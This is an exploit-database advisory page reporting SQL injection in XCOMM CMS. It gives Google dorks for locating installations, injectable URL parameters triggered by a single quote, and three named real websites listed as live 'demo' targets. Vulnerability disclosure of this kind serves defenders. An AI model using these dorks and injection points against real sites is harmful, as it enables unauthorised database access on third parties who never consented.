XCOMM CMS Sql Injection

2015.10.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : XCOMM CMS Sql Injection # Exploit Author : DigiBoys UnderGround Team # Vendor Homepage : xcomm.net.pk # Google Dork : inurl:'writeup.php?wid=' & inurl:'products.php?IDZ=1' & inurl:'/products.php?IDZ=1-2-0-0-0-0-1' # Date: 2015/1/10 # Tested On : Kali 2.0 - Chromium # ###################### # Vulnerablity 1 : localhost/writeup.php?wid=1' # Vulnerablity 2 : localhost/products.php?IDZ=1-2-0-0-0-0-1' # Vulnerablity 3 : localhost/products.php?IDZ=1' # # Demo : # # Vulnerablity 1 : www.siwijas.com/writeup.php?wid=1' # Vulnerablity 2 : www.fircosfashion.com/product_detail.php?IDZ=5' # Vulnerablity 3 : www.safnimpex.com/products.php?IDZ=1' # ###################### # discovered by : BadBoy17 # Gmail : Digi0days@Gmail.com ######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top